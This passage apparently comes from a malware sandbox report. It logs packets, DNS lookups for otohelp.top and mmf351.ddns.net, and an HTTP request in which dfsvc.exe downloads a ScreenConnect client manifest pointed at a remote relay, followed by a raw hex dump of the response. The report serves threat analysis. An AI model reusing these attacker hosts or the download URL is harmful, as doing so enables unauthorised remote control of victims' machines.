                                                                                                                                                Oct 2, 2024 06:25:35.583944082 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.583985090 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:35.668900013 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.668926001 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.669054985 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:35.669097900 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.669154882 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:35.669708014 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.669724941 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.669904947 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:35.669919014 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.669971943 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:35.671153069 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.671169043 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.671228886 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:35.671245098 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.671291113 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:35.745675087 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.745701075 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.745814085 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:35.745901108 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.745956898 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:35.755686998 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.755706072 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.755783081 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:35.755817890 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.755870104 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:35.756504059 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.756521940 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.756586075 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:35.756593943 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.756639004 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:35.757304907 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.757323027 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.757388115 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:35.757395983 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.757447004 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:35.758141994 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.758158922 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.758218050 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:35.758227110 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.758270979 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:35.821691990 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.821716070 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.821768045 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:35.821814060 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.821834087 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:35.821861029 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:35.832056046 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.832072973 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.832140923 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:35.832151890 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.832199097 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:35.832530975 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.832546949 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.832603931 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:35.832612991 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.832655907 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:35.842231035 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.842247009 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.842303991 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:35.842315912 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.842363119 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:35.842714071 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.842730045 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.842783928 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:35.842791080 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.842833996 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:35.843312025 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.843327999 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.843408108 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:35.843416929 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.843461037 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:35.843945026 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.843960047 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.844006062 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:35.844013929 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.844039917 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:35.844058037 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:35.844582081 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.844598055 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.844656944 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:35.844664097 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.844707012 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:35.908452034 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.908480883 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.908576012 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:35.908627033 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.908710003 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:35.920260906 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.920275927 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.920474052 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:35.920511007 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.920563936 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:35.920753002 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.920770884 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.920838118 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:35.920846939 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.920892000 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:35.929234982 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.929249048 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.929337025 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:35.929374933 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.929435015 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:35.929861069 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.929877043 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.929949045 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:35.929975986 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.930017948 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:35.930381060 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.930397034 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.930447102 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:35.930459976 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.930479050 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:35.930500984 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:35.930903912 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.930918932 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.930986881 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:35.931000948 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.931036949 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:35.931291103 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.931314945 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.931371927 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:35.931381941 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.931431055 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:35.995505095 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.995531082 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.995635033 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:35.995680094 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:35.995738983 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:36.005944967 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:36.005969048 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:36.006043911 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:36.006078005 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:36.006120920 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:36.006329060 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:36.006347895 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:36.006409883 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:36.006421089 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:36.006464005 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:36.016196012 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:36.016218901 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:36.016284943 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:36.016305923 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:36.016351938 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:36.016820908 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:36.016839981 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:36.016902924 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:36.016911983 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:36.016954899 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:36.017349958 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:36.017366886 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:36.017398119 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:36.017425060 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:36.017436981 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:36.017462969 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:36.017496109 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:36.017652035 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:36.017719030 CEST4434973879.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:36.017772913 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:36.017959118 CEST49738443192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:38.518790007 CEST497408041192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:38.524164915 CEST80414974079.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:38.524235010 CEST497408041192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:39.135921001 CEST497408041192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:39.141253948 CEST80414974079.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:39.311599970 CEST80414974079.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:39.361880064 CEST497408041192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:39.362370968 CEST497408041192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:39.367139101 CEST80414974079.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:39.549000978 CEST80414974079.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:39.596215010 CEST497408041192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:41.285535097 CEST497408041192.168.2.679.110.49.16
                                                                                                                                                Oct 2, 2024 06:25:41.290503025 CEST80414974079.110.49.16192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:41.290668964 CEST497408041192.168.2.679.110.49.16
                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                Oct 2, 2024 06:25:13.943995953 CEST5132153192.168.2.61.1.1.1
                                                                                                                                                Oct 2, 2024 06:25:14.940165043 CEST5132153192.168.2.61.1.1.1
                                                                                                                                                Oct 2, 2024 06:25:15.767126083 CEST53513211.1.1.1192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:15.767142057 CEST53513211.1.1.1192.168.2.6
                                                                                                                                                Oct 2, 2024 06:25:38.478089094 CEST5071653192.168.2.61.1.1.1
                                                                                                                                                Oct 2, 2024 06:25:38.486351013 CEST53507161.1.1.1192.168.2.6
                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                Oct 2, 2024 06:25:13.943995953 CEST192.168.2.61.1.1.10xf73Standard query (0)otohelp.topA (IP address)IN (0x0001)false
                                                                                                                                                Oct 2, 2024 06:25:14.940165043 CEST192.168.2.61.1.1.10xf73Standard query (0)otohelp.topA (IP address)IN (0x0001)false
                                                                                                                                                Oct 2, 2024 06:25:38.478089094 CEST192.168.2.61.1.1.10x1375Standard query (0)mmf351.ddns.netA (IP address)IN (0x0001)false
                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                Oct 2, 2024 06:25:15.767126083 CEST1.1.1.1192.168.2.60xf73No error (0)otohelp.top79.110.49.16A (IP address)IN (0x0001)false
                                                                                                                                                Oct 2, 2024 06:25:15.767142057 CEST1.1.1.1192.168.2.60xf73No error (0)otohelp.top79.110.49.16A (IP address)IN (0x0001)false
                                                                                                                                                Oct 2, 2024 06:25:18.970045090 CEST1.1.1.1192.168.2.60x879bNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                Oct 2, 2024 06:25:18.970045090 CEST1.1.1.1192.168.2.60x879bNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                Oct 2, 2024 06:25:20.574424982 CEST1.1.1.1192.168.2.60x36f1No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                Oct 2, 2024 06:25:20.574424982 CEST1.1.1.1192.168.2.60x36f1No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                Oct 2, 2024 06:25:38.486351013 CEST1.1.1.1192.168.2.60x1375No error (0)mmf351.ddns.net79.110.49.16A (IP address)IN (0x0001)false
                                                                                                                                                • otohelp.top
                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                0192.168.2.64971479.110.49.164436456C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-02 04:25:16 UTC623OUTGET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=mmf351.ddns.net&p=8041&s=b044e727-8609-4a6c-b885-92d6249fd38a&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session HTTP/1.1
                                                                                                                                                Host: otohelp.top
                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                2024-10-02 04:25:16 UTC251INHTTP/1.1 200 OK
                                                                                                                                                Cache-Control: private
                                                                                                                                                Content-Length: 118084
                                                                                                                                                Content-Type: application/x-ms-application; charset=utf-8
                                                                                                                                                Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                Date: Wed, 02 Oct 2024 04:25:16 GMT
                                                                                                                                                Connection: close
                                                                                                                                                2024-10-02 04:25:16 UTC16133INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 61 73 6d 76 31 3a 61 73 73 65 6d 62 6c 79 20 78 73 69 3a 73 63 68 65 6d 61 4c 6f 63 61 74 69 6f 6e 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 20 61 73 73 65 6d 62 6c 79 2e 61 64 61 70 74 69 76 65 2e 78 73 64 22 20 6d 61 6e 69 66 65 73 74 56 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 31 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 22 20 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 32 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 32 3d
                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2=
                                                                                                                                                2024-10-02 04:25:16 UTC16384INData Raw: 47 6c 69 52 47 38 79 66 59 52 6f 64 77 71 45 6c 46 44 4c 68 4b 54 47 45 6b 53 6b 48 75 45 45 6c 4f 31 6d 42 49 59 67 77 51 54 4d 39 72 37 45 35 69 6e 4a 52 53 58 55 49 59 55 79 31 33 46 46 43 58 6b 4e 52 56 67 42 49 49 56 64 59 61 51 46 57 34 36 48 68 59 43 77 4a 63 57 48 61 72 43 46 67 30 41 33 42 5a 69 6a 54 45 5a 37 35 39 53 47 39 4a 2f 42 78 37 6a 76 49 67 65 76 55 2b 52 48 6d 39 47 32 52 37 6f 79 66 6f 65 77 58 79 75 48 77 39 4f 45 53 42 36 7a 43 6f 67 4a 72 39 62 49 45 39 4b 4f 79 46 4a 6c 31 59 68 45 58 59 63 49 74 50 52 58 43 4c 58 66 4a 4d 69 37 52 32 79 49 75 4c 43 75 53 4b 59 33 42 51 6a 4e 43 7a 2b 49 2f 2b 4a 57 79 52 67 6f 57 67 6b 77 6a 5a 75 4a 47 48 4c 62 69 51 6a 30 32 38 6b 68 48 35 7a 4a 4c 4a 32 74 43 54 42 31 6d 59 6c 66 59 4e 57 4a
                                                                                                                                                Data Ascii: GliRG8yfYRodwqElFDLhKTGEkSkHuEElO1mBIYgwQTM9r7E5inJRSXUIYUy13FFCXkNRVgBIIVdYaQFW46HhYCwJcWHarCFg0A3BZijTEZ759SG9J/Bx7jvIgevU+RHm9G2R7oyfoewXyuHw9OESB6zCogJr9bIE9KOyFJl1YhEXYcItPRXCLXfJMi7R2yIuLCuSKY3BQjNCz+I/+JWyRgoWgkwjZuJGHLbiQj028khH5zJLJ2tCTB1mYlfYNWJ
                                                                                                                                                2024-10-02 04:25:16 UTC16384INData Raw: 55 41 62 41 42 4e 41 47 45 41 62 67 42 68 41 47 63 41 5a 51 42 44 41 48 49 41 5a 51 42 6b 41 47 55 41 62 67 42 30 41 47 6b 41 59 51 42 73 41 48 4d 41 52 41 42 6c 41 48 4d 41 59 77 42 79 41 47 6b 41 63 41 42 30 41 47 6b 41 62 77 42 75 41 43 49 4e 41 41 42 45 51 77 42 76 41 47 34 41 64 41 42 79 41 47 38 41 62 41 42 51 41 47 45 41 62 67 42 6c 41 47 77 41 54 51 42 68 41 47 34 41 59 51 42 6e 41 47 55 41 51 77 42 79 41 47 55 41 5a 41 42 6c 41 47 34 41 64 41 42 70 41 47 45 41 62 41 42 7a 41 46 51 41 61 51 42 30 41 47 77 41 5a 51 42 5a 44 51 41 41 54 45 4d 41 62 77 42 75 41 48 51 41 63 67 42 76 41 47 77 41 55 41 42 68 41 47 34 41 5a 51 42 73 41 45 30 41 59 51 42 75 41 47 45 41 5a 77 42 6c 41 46 41 41 5a 51 42 79 41 48 4d 41 62 77 42 75 41 47 45 41 62 41 42 55 41
                                                                                                                                                Data Ascii: UAbABNAGEAbgBhAGcAZQBDAHIAZQBkAGUAbgB0AGkAYQBsAHMARABlAHMAYwByAGkAcAB0AGkAbwBuACINAABEQwBvAG4AdAByAG8AbABQAGEAbgBlAGwATQBhAG4AYQBnAGUAQwByAGUAZABlAG4AdABpAGEAbABzAFQAaQB0AGwAZQBZDQAATEMAbwBuAHQAcgBvAGwAUABhAG4AZQBsAE0AYQBuAGEAZwBlAFAAZQByAHMAbwBuAGEAbABUA
                                                                                                                                                2024-10-02 04:25:16 UTC16384INData Raw: 41 41 5a 51 42 79 41 47 30 41 61 51 42 7a 41 48 4d 41 61 51 42 76 41 47 34 41 63 77 42 45 41 47 6b 41 59 51 42 73 41 47 38 41 5a 77 42 55 41 47 55 41 65 41 42 30 41 45 4d 41 62 77 42 75 41 48 51 41 5a 51 42 75 41 48 51 41 52 67 42 76 41 48 49 41 62 51 42 68 41 48 51 41 65 79 30 41 41 45 35 4e 41 47 45 41 59 77 42 4a 41 47 34 41 63 77 42 30 41 48 49 41 64 51 42 6a 41 48 51 41 61 51 42 76 41 47 34 41 59 51 42 73 41 45 51 41 61 51 42 68 41 47 77 41 62 77 42 6e 41 45 51 41 61 51 42 7a 41 47 30 41 61 51 42 7a 41 48 4d 41 51 67 42 31 41 48 51 41 64 41 42 76 41 47 34 41 56 41 42 6c 41 48 67 41 64 41 43 4b 4d 51 41 41 51 6b 30 41 59 51 42 6a 41 46 49 41 5a 51 42 70 41 47 34 41 63 77 42 30 41 47 45 41 62 41 42 73 41 46 55 41 62 67 42 70 41 47 34 41 63 77 42 30 41
                                                                                                                                                Data Ascii: AAZQByAG0AaQBzAHMAaQBvAG4AcwBEAGkAYQBsAG8AZwBUAGUAeAB0AEMAbwBuAHQAZQBuAHQARgBvAHIAbQBhAHQAey0AAE5NAGEAYwBJAG4AcwB0AHIAdQBjAHQAaQBvAG4AYQBsAEQAaQBhAGwAbwBnAEQAaQBzAG0AaQBzAHMAQgB1AHQAdABvAG4AVABlAHgAdACKMQAAQk0AYQBjAFIAZQBpAG4AcwB0AGEAbABsAFUAbgBpAG4AcwB0A
                                                                                                                                                2024-10-02 04:25:16 UTC16384INData Raw: 4e 6f 62 32 39 7a 5a 53 42 33 61 47 6c 6a 61 43 42 73 62 32 64 76 62 69 42 7a 5a 58 4e 7a 61 57 39 75 49 48 52 76 49 47 4e 76 62 6e 52 79 62 32 77 67 62 32 34 67 64 47 68 6c 49 48 4a 6c 62 57 39 30 5a 53 42 74 59 57 4e 6f 61 57 35 6c 4c 67 45 55 55 32 56 73 5a 57 4e 30 49 45 78 76 5a 32 39 75 49 46 4e 6c 63 33 4e 70 62 32 34 42 45 56 4e 6c 62 47 56 6a 64 43 42 4e 61 57 4e 79 62 33 42 6f 62 32 35 6c 41 53 74 44 61 47 39 76 63 32 55 67 62 32 35 6c 49 47 39 79 49 47 31 76 63 6d 55 67 63 6d 56 74 62 33 52 6c 49 47 31 76 62 6d 6c 30 62 33 4a 7a 49 48 52 76 49 48 5a 70 5a 58 63 75 41 51 39 54 5a 57 78 6c 59 33 51 67 54 57 39 75 61 58 52 76 63 6e 4d 42 52 6b 4e 6f 62 32 39 7a 5a 53 42 68 49 47 78 76 64 32 56 79 49 48 46 31 59 57 78 70 64 48 6b 67 61 57 59 67 62
